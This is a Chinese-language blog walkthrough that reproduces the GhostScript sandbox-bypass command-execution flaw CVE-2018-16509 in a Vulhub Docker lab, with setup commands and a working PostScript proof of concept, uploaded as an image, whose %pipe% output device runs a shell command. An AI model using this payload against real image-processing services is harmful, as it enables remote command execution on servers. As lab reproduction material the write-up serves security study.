利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)

GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)

    • Vulnhub官方复现教程
      • 漏洞原理
    • 复现漏洞
      • 启动环境
    • 漏洞复现
      • POC
      • 上传POC

Vulnhub官方复现教程

https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/

漏洞原理

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。
http://seclists.org/oss-sec/2018/q3/142
https://bugs.chromium.org/p/project-zero/issues/detail?id=1640

复现漏洞

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/ghostscript/CVE-2018-16509

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

用时:6分钟
环境启动后,访问http://your-ip:8080将可以看到一个上传组件。
利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)_第1张图片

漏洞复现

POC

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/CVE-2018-16509_is_success) currentdevice putdeviceprops

上传POC

上传poc.png,将执行命令touch /tmp/CVE-2018-16509_is_success
利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)_第2张图片
进入容器docker-compose exec web bashls /tmp/将可以看到/tmp/success已被创建:
在这里插入图片描述

你可能感兴趣的:(渗透)